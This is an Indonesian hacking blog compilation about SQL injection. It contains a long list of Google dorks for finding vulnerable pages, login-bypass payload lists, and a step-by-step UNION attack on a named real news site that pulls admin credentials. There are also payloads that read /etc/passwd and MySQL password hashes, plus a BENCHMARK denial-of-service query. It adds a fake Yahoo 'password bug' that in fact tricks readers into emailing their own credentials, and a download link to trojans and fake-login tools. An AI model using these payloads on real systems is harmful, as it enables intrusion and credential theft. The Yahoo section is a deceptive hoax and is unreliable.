Rumus SQL


http://www.vimeo.com/1536040?pg=embed&sec=1536040
SQL dork
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:".php?id=1"
inurl:".php?cat=1"
inurl:".php?catid=1"
inurl:".php?num=1"
inurl:".php?bid=1"
inurl:".php?pid=1"
inurl:".php?nid=1"
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

DASAR-DASAR SQL INJECTION

Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan kenapa bisa terjadi.
Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query' dengan cara manipulasi data input ke applikasi tsb.
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,disini saya cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan beberapa sql injection pada url.

Biasa Sql Injection dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp
Jadi yang akan menjadi target itu page tersebut ,sekarang kita mulai aja dengan dasar-dasar sql injection.
Biasanya di sql statment
select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :
select id, user_name,password from user where name = 'echo' and password='password'
Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language" seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote 'breaks out' dari delimiter nya SQL Jadi kalau misal ada inputan
User: echo';drop table user--
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya :Doh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.Sekarang untuk lebih jelasnya kita secara langsung pada login script sepertiinput login + password. Nama field nya 'login' dan 'pass'. dan SQL nya di asp:
var sql = select * from users where username='"+login+"' and password='"+pass"'";
coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)pasti ke drop tuh table usersAduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas :P kita langsung praktek aja.
Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau admin\login.asp.
Kalau udah dapet masukin nich variable sql nya
user:admin
pass:' or 1=1--
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter
atau :
user:' or 1=1--
admin:' or 1=1--
Mas , ga bisa nich gimana ya ?Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisabuat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://vivtim/index.asp?id=10
Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahanpada addressnya seperti memasukan : test'1=1--
menjadi http://victim/index.asp?id=test'1=1--
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page targetlalu kita tamhankan hidden field pada source tersebut sebagai contoh :

Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.ingat script ini ditamhakna pd script yg sudah kalian download dr target .
Variable ' or 1=1--
Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contohpada sebuah web tertulis http://victim/index.asp?category=laptopDalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .Kalau ditulis dalam script ASP maka akan menjadi :
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi
SELECT * FROM product WHERE PCategory='laptop'
lalu apa hub dengan 'or 1=1---
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
http://victim/index.asp?category=laptop'or 1=1--
Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi
SELECT * FROM product WHERE PCategory='laptop' or 1=1--'
artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkanSql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkankita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login pageKita bisa masuk kedalam login page tanpa password dan user name :d.Kemungkinan-kemungkinan variable lainya :
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Tutorial SQL Injection Pada MYSQL

Yang perlu di ketahui sebelum sql injection pada mysql:

comments: /*,--
sering ditemui pada web application: php,dll..
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

langsung saja...

contoh target kita adalah http://www.lampungpost.com...

step 1. mengetahui situs itu vulnerable sql injection atau tidak

*menggunakan tanda petik,or 1=1,etc

bila mengunakan cara diatas tanda petik,or 1=1,dll maka umumnya kita akan mendapatkan pesan error.

http://www.target.com/blabla.php?id=123'
http://www.target.com/blabla.php?id=123 or 1=1

Error Type:
pada php.

Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in blah/blah/blah.php on line x


pada asp.

Code:
[MySQL][ODBC x.xx Driver][mysqld-x.x.xxx-xxx]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'x' at line x


cara ini tidak efektif untuk php. karna php mempunyai sesuatu yang disebut "sql error handling" yang membuat pesan error tidak akan dimuncul diweb tetapi disimpan didalam logs.

*menggunakan tanda minus,and 1=1,and 1=2,etc

bila menggunakan cara ini umumnya kita akan mendapat teks yang menghilang,blank,picture yang tidak bisa terlihat,error (jarang terjadi),etc.

kita ambil url http://www.lampungpost.com/aktual/berita.php?id=2254



sekarang berikan tanda minus setelah = atau bisa juga -1 biar lebih gampang, bila teks hilang maka vulnerable..

menjadi, http://www.lampungpost.com/aktual/berita.php?id=-2254



step 2. Blind SQL Injection

Blind SQL Injection adalah dimana kita mendapatkan data tidak melalui pesan error. untuk memahami blind sql injection lebih jauh bisa dilihat di:
http://echo.or.id/forum/viewtopic.php?t=7862

bila kamu mengetahui situs tersebut vulnerable melalui tanda petik,or 1=1,etc . maka kamu harus menggunakan tanda minus,and 1=2,etc baru kemudian mengunakan union select dan add number (biasa disebut "column count ") sampai muncul angka pada web tersebut.

contoh melakuan column count :

union select diikuti dengan angka.

Code:
hxxp://ww.lampungpost.com/aktual/berita.php?id=-1%20union%20select%201/*

Code:
hxxp://ww.lampungpost.com/aktual/berita.php?id=-1%20union%20select%201,2/*

Code:
hxxp://ww.lampungpost.com/aktual/berita.php?id=-1%20union%20select%201,2,3,/*

ternyata yang keluar sampai angka 9

Code:
hxxp://ww.lampungpost.com/aktual/berita.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9/*

disitu kamu bisa melihat dua angka 9 dan 2



step 3. mengeluarkan table_name

query yang kita gunakan adalah : union select table_name from information_schema.tables where table_schema=database() limit 0,1

masukan "table_name" pada angka yang keluar (9 atau 2) diikuti "from information_schema.tables where table_schema=database() limit 0,1"

menjadi,
Code:
hxxp://www.lampungpost.com/aktual/berita.php?id=-1%20union%20select%201,table_name,3,4,5,6,7,8,920%20FROM%20information_schema.tables%20where%20table_schema=database()%20limit%200,1/*

kamu juga bisa memasukan table_name ke angka 9 (karna angka yang keluar 9 dan 2)

Code:
hxxp://ww.lampungpost.com/aktual/berita.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,table_name20%20FROM%20information_schema.tables%20where%20table_schema=database()%20limit%200,1/*

tapi disini del_caeser menggunakan 2.



untuk mengeluarkan table_name yang lain ganti "limit 0,1"menjadi "limit 1,1";"limit 2,1";"limit 3,1" sampai tidak keluar lagi table_namenya, hanya menambahkan angka didepan limit tapi tidak dibelakang koma. hal itu karna mysql tidak support "not in" tapi limit

table_name kedua

Code:
hxxp://ww.lampungpost.com/aktual/berita.php?id=-1%20union%20select%201,table_name,3,4,5,6,7,8,920%20FROM%20information_schema.tables%20where%20table_schema=database()%20limit%201,1/*



table_name ketiga

Code:
hxxp://www.lampungpost.com/aktual/berita.php?id=-1%20union%20select%201,table_name,3,4,5,6,7,8,920%20FROM%20information_schema.tables%20where%20table_schema=database()%20limit%202,1/*



disini target kita mencari admin id dan pass.., dan itu ada di limit 10,1 table_name "user"

Code:
http://ww.lampungpost.com/aktual/berita.php?id=-1%20union%20select%201,table_name,3,4,5,6,7,8,920%20FROM%20information_schema.tables%20where%20table_schema=database()%20limit%2010,1/*



step 4. mengeluarkan column_name

query yang kita gunakan adalah : union select column_name from information_schema.columns where table_name='table_name target' limit 0,1

masukan "column_name" pada angka yang keluar (9 atau 2) diikuti "from information_schema.columns where table_name='table_name target' limit 0,1"

dalam hal ini table_name target adalah "user"

menjadi,
Code:
hxxp://ww.lampungpost.com/aktual/berita.php?id=-1%20union%20select%201,column_name,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_name='user'%20limit%200,1/*


untuk mengeluarkan column_name yang lain ganti "limit 0,1"menjadi "limit 1,1";"limit 2,1";"limit 3,1" sampai tidak keluar lagi column_namenya, hanya menambahkan angka didepan limit tapi tidak dibelakang koma. hal itu karna mysql tidak support "not in" tapi limit

( tidak ada screenshot maqic quote off karna lampungpost.com maqic quote on)

* Filter Input
filter input adalah untuk mencegah sql injection, salah satunya adalah magic quote gpc (php), magic quote sendiri adalah filter input terhadap tanda kutip dengan menambahkan backslash pada tanda kutip yang diinputkan.

contoh:

Quote:
hxxp://ww.lampungpost.com/aktual/berita.php?id=-1 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name='user' limit 0,1/*


perhatikan 'user' kalau maqic quote gpc on:

Quote:
hxxp://ww.lampungpost.com/aktual/berita.php?id=-1 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=/'user/' limit 0,1/*


itu merusak query yang kita gunakan, tapi kita bisa bypass dengan ascii mengunakan hexa Decimal atau char.
kamu bisa coba disini http://www.piclist.com/techref/ascii.htm . untuk hexa desimal, setiap hexa desimal yang dihasilkan didepannya ditambahkan 0x.





column_namenya adalah "userid" dan "password"

step 5. mengeluarkan field

query yang kita gunakan adalah : UNION SELECT column_name FROM table_name

colomn_name :userid, password
table_name :user

masukan column_name pada angka yang keluar (9 dan 2) kemudian FROM table_name

menjadi,
Code:
hxxp://ww.lampungpost.com/aktual/berita.php?id=-1%20union%20select%201,password,3,4,5,6,7,8,userid%20from%20user/*



dan kita mendapatkan filednya "berita" unutk "userid" dan "nokia" unutk "password".

* Mengunakan Concatenation

Concatenation adalah kondisi dimana kamu ingin mengeluarkan field dengan banyak colomn_name atau karna kurangnya angka yang keluar saat blind union. untuk string Concatenation pada mysql adalah CONCAT(A,B,C,...)

contoh:
kondisi kurangnya angka yang keluar saat blind union.
column_name : userid, password, description
table_name :user
angka yang keluar: 2 dan 9

bagaimana kita mengeluarkan field dengan 3 column_name sedangkan angka yang keluar hanya 2 (2 dan 9), jawabanya menggunakan concat() tadi.


Code:
hxxp://ww.lampungpost.com/aktual/berita.php?id=-1%20union%20select%201,concat(userid,0x3a,password,0x3a,description ),3,4,5,6,7,8,9%20from%20user/*


kamu juga bisa seperti ini,
Code:
hxxp://ww.lampungpost.com/aktual/berita.php?id=-1%20union%20select%201,concat(userid,0x3a,password),3,4,5,6,7,8,description%20from%20user/*


syntax-nya seperti ini concat(column_name,0x3a,column_name,0x3a,column_name,0x3a,..... ) 0x3a artinya :



Beberapa query mysql


melihat database name :

database()

Code:
http://www.site.com/index.php?page=-1+union+select+1,2,database(),3,5,6/

melihat database version :

version()

Code:
http://www.site.com/index.php?page=-1+union+select+1,2,version() ,3,5,6/


melihat waktu pada database :

now()

Code:
http://www.site.com/index.php?page=-1+union+select+1,2,now(),3,5,6/


melihat MySQL and Apache location

@@basedir

Code:
http://www.site.com/index.php?page=-1+union+select+1,2,@@basedir,3,5,6/*

@@datadir

Code:
http://www.site.com/index.php?page=-1+union+select+1,2,@@datadir,3,5,6/*

@@tmpdir

Code:
http://www.site.com/index.php?page=-1+union+select+1,2,@@tmpdir,3,5,6/*

@@version_compile_os

Code:
http://www.site.com/index.php?page=-1+union+select+1,2,@@version_compile_os,3,5,6/*

membaca file :

load_file('/etc/passwd')

Code:
http://www.site.com/index.php?page=-1+union+select+1,2,load_file('/etc/passwd'),3,5,6/*

password root :

select user,password from mysql.user

Code:
http://www.site.com/index.php?page=-1+union+select+1,2,user,password,5,6+from+mysql.user/*

DOS :

BENCHMARK(100000000000000000000000000000000000000000000000000000000,md5(now( )))

Code:
http://www.site.com/index.php?page=-1+union+select+1,2,BENCHMARK(100000000000000000000000000000000000000000000000000000000,md5(now( ))),3,5,6/*

By : del_caeser
Jutaan newbies & Script kiddies di dunia pada umumnya memiliki pertanyaan yang sama dan rasa ketertarikan yang sama terhadap satu hal special ini: Bagaimana cara mendapatkan pasword dan memonitor email orang lain?
Melalui artikel ini saya ingin mencoba untuk membungkam mulut-mulut mereka agar di masa yang mendatang tidak ada generasi-generasi dari mereka yang menanyakan hal yang sama berulang-ulang. Jika anda bukan bagian dari mereka dan anda paham betul apa maksud artikel ini dan apa tujuan saya menerbitkan artikel ini, maka dengan segala hormat saya meminta kepada anda untuk bisa memaklumi tindakan saya ini.
Wahai para newbies dan script kiddies…!! Selamat berpesta!!! (^_*)

|–[2. Bugs pada Yahoo Mail
---------------------------
Yahoo Mail (http://mail.yahoo.com) memiliki sistem pertahanan yang cukup tangguh. Disamping itu, tampilan mailbox yang menawan dan banyakanya fitur- fitur menarik yang tersedia dibandingkan dengan penyedia layanan email berbasis web gratisan lainnya menjadi alasan utama bagi mereka untuk memilih Yahoo!
Ketika dahulu (dan juga hingga kini) tehnik session hijacking semakin marak dikalangan para attacker, pengguna Yahoo Mail bisa sedikit berlega hati karena Yahoo telah mengantisipasi hal tersebut dengan menerapkan beberapa aturan berikut:
1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi client side.
Keempat hal diatas telah cukup untuk membuat banyak para kiddies harus gigit jari karena serangan session hijacking akan sangat-sangat sulit untuk dilakukan (karena ketidakmampuan mereka tentunya dan pengecualian bagi kaum elite :P)
Tapi bagi kamu yang sangat-sangat bernafsu untuk bisa menembus email yahoo orang lain kini bisa sedikit terhibur karena telah ada sebuah bugs baru pada Yahoo. Yahoo memiliki sebuah alamat email special yang otomatis dikendalikan oleh mesin yang jika kita kirimkan sebuah nilai "uid" trenkripsi kepada alamat itu bersama alamat email korban, maka kamu akan memperoleh balasan email otomatis yang berisi password korban :)

|--[3. Memanfaatkan Bugs
Sudah gak sabar yach... :)okay, sekarang ikuti langkah-langkah berikut:
Sign in lah kedalam account kamu terlebih dahulu, kemudian dengan perasaan yang mendalam, tekan tombol [Compose]/[tulis surat] untuk menulis email.
Pada form isian to: masukkan alamat berikut: auto_respon@yahoo.com Alamat inilah yang saya sebutkan sebagai alamat special tadi. Sebenarnya alamat ini hanya boleh diketahui oleh para admin Yahoo saja, namun yeah.. kini alamat mematikan ini telah jatuh ke tangan kita :)
Pada form cc dan bcc, kosongi saja kedua form tersebut sedangkan pada form Subject ketik “uid” tanpa tanda kutip.
Pada form message (pesan), ketik kode UID berikut:
mail.yahoo.com FALSE/FALSE 1020114252
6d 61 69 6c 6e 10 : alamat email kamu
C7 CB C3 C6 84 C9 : password kamu
6C 61 6D 65 72 69 : alamat email korban
Setelah itu tekan tombol send. Dan tunggulah dalam beberapa hari kamu akan menerima email balasan yang berisi password korban dan informasi-informasi mengenai korban seperti secreet question yang dipakai korban beserta jawabannya dan tanggal lahir korban :)
Contohnya: misalkan alamat email kamu adalah elite@yahoo.com dan password kamu 3l1t3b3n3r4n dan alamat email korban korban@yahoo.com maka susunannya adalah sebagai berikut:
to: auto_respon@yahoo.com
cc:
bcc:
Subject: uid
message:
mail.yahoo.com FALSE/FALSE 1020114252
6d 61 69 6c 6e 10 : elite@yahoo.com
C7 CB C3 C6 84 C9 : 3l1t3b3n3r4n
61 6D 6C 65 72 69 : korban@yahoo.com

|–[4. Cara Pencegahan
———————-
Bagi kamu para pengguna email yahoo yang tidak ingin passwordmu dicuri dengan tehnik ini, lakukan cara berikut:
Pada form isian to: isikan auto_respon@yahoo.com
Pada form isian cc dan bcc kosongi saja kedua form tersebut dan pada subject ketik “nouid” tanpa tanda kutip.
Kirim message sebagai berikut:
mail.yahoo.com FALSE/FALSE 1020114252
63 65 77 65 63 61 78 65 70 : NOVIEWPWD
alamat email kamu : password kamu
contohnya:
to: auto_respon@yahoo.com
cc:
bcc:
subject: nouid
message:
mail.yahoo.com FALSE/FALSE 1020114252
63 65 77 65 63 61 78 65 70 : NOVIEWPWD
elite@yahoo.com : 3l1t3b3n3r4n
Setelah mengirim email tersebut, maka bisa dipastikan email kamu sudah aman dari bugs mematikan ini. Orang yang berusaha melakukan tehnik ini tidak akan pernah mendapat balasan email yang berisi passswordmu. Namun harap diingat bahwa kamu juga harus melakukan hal ini setelah melakukan perubahan account. Jadi jika suatu ketika kamu mengganti password, lakukan cara penyelamatan lagi.

Image
========================== Yahoo Hacking Tools ===========================

Yahoo Hacking Tools adalah Tools Portable dalam Kegiatan Hacking Yahoo messenger.
dalam Yahoo Hacking Tools ini terdapat Software :

1. Emo Creator
Tools untuk membuat Icon2

2. Fake Pager
Adalah aplikasi Yahoo Messenger Palsu, yang berguna untuk mencuri user name
dan password.

3. Magic Password
Trojan yang digunakan untuk mencuri password

4. Yahoo Booter.
Aplikasi untuk memboot lawan chating

5. Yahoo Fake Cam
Tools untuk mengecoh lawan chating dengan Cam Palsu :twisted:

6. Yahoo Fake Login
Halaman Login Palsu Yahoo (2008), yah buat nyuri password orang yang akan dikirim ke email

7. Yahoo PAss Stealler
Trojan Builder untuk nyulik password :)

8. Yahoo Hack
Yahoo messengger Palsu

9. Yahoo Pass Crack
Crack Password Yahoo seseorang

10. Yahoo Password Recovery
Untuk mengetahui Password dan user name ym seseorang

Download : http://www.ziddu.com/download/2832248/Yahoo_hacking___pass_h4ck3v1l__.rar.html

Password : h4ck3v1l
Aku akan mencoba menjelaskan sesimple mungkin tentang blind sql injection yang aku anggap dulu rumit banget... Bukannya sok ngajarin atau apalah, disini aku hanya berusaha memberikan apa yang aku punya dan bisa...

Oke, semua bermula karena aku suntuk banget...Semua target .go.id, co.id atau apapun.id dah dibabat habis sama senior disini...Akhirnya tanpa sengaja aku nyangkut ke situs luar...Anggep aja situs tersebut bernama

http://iseng.com/news.php?id=76009

Nah pada target aku kali ini, aku menggunakan sql commands mid() yang hampir sama fungsinya dengan substring()...

Langsung aja aku ketik

http://iseng.com/news.php?id=76009 and 1=0
dan ternyata hasilnya adalah FALSE

http://iseng.com/news.php?id=76009 and 1=1
bernilai TRUE

Nah setelah aku yakin kalo web tersebut vulnerable maka aku melakukan injeksi (hehehehe...)

http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65)

Nah penjelasannya supaya lo semua pada ngerti (hehehehe...orang aku juga baru belajar, sok ngasih tau...) aku akan coba menjelaskan arti dan makna dari baris URL dan statement diatas...

~ mid(user()1,1) artinya dalam kasus ini aku tidak mengetahui value atau nilai dari user itu apa, maka dalam "()" aku sengaja kosongkan.

~ 1,1 adalah urutan dari value tersebut.

~ CHAR adalah peubah dalam desimal

~ 65 adalah value decimal tersebut dan 65 adalah "A" dalam ASCII so aku akan mengawalinya dengan 65

Nah kalo dah begini apa yang akan terjadi? Dalam tampilan web tersebut akan terjadi true atau false...Nah dalam kasus ini false, berarti aku harus memasukkan nilai yang lain agar menjadi true...

FALSE
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65)

FALSE
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(66)

TRUE!!!
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(67)

Akhirnya mendapatkan nilai true dan nilai tersebut adalah 67 (C dalam ASCII)

Cari nilai kedua dan caranya adalah...

http://iseng.com/news.php?id=76009 and mid(user(),1,2)=CHAR(67,65)

Nah 1,1 nya dah diganti dengan 1,2...Jadi kalo dah dapet diganti aja jadi 1,3...1,4 dan seterusnya...

Nah akhirnya aku mendapat nilai true pada angka ke 82 (R dalam ASCII)

Lanjutin aja sampe dapet nilai atau value user dan sampai akhirnya menjadi

http://iseng.com/news.php?id=76009 and mid(user(),1,6)=CHAR(67,82,85,90,51,78)

67=C
82=R
85=U
90=Z
51=3
78=N

Ternyata username-nya adalah CRUZ3N (Wow.... Kebetulan yang sangat lucu ;p)

Nah untuk cari passwordnya aku tinggal mengganti value user() menjadi database() dan lakukan semua tahap diatas dari pertama sampe dapet value true...

Contoh:

http://iseng.com/news.php?id=76009 and mid mid(database(),1,5)=CHAR(75,69,82,69,78)

Jadi password yang didapat adalah...

75=K
69=E
82=R
69=E
78=N

Jadi username dan passwordnya adalah CRUZ3N dan KEREN...

Ternyata Blind SQL Injection gak nyebel-nyebelin amat (Tapi ngebetein...). Nah katanya neh...cara ini cukup efektif untuk web yang telah menfilter SQL Injection...Bener gak tuh? Gak tau dah... Ilmu aku belom nyampe situ...

Oke sampe disini aja yah...
Mohon maaf jika ada salah-salah kata dan berhubung aku lupa jadi kagak ada screenshootnya (Padahal kalo ada keren banget tuh ;p).

Semoga penjelasan yang sangat amat singkat dan gak ada apa-apanya ini dapat berguna...

Nih kode ASCII yang sapa tau berguna...

Char Code Description

9 Tab
10 Line feed
13 Carriage return
' ' 32 Space
! 33 Exclamation mark
" 34 Quotation mark
# 35 Number sign
$ 36 Dollar sign
% 37 Percent sign
& 38 Ampersand
' 39 Apostrophe
( 40 Left parenthesis
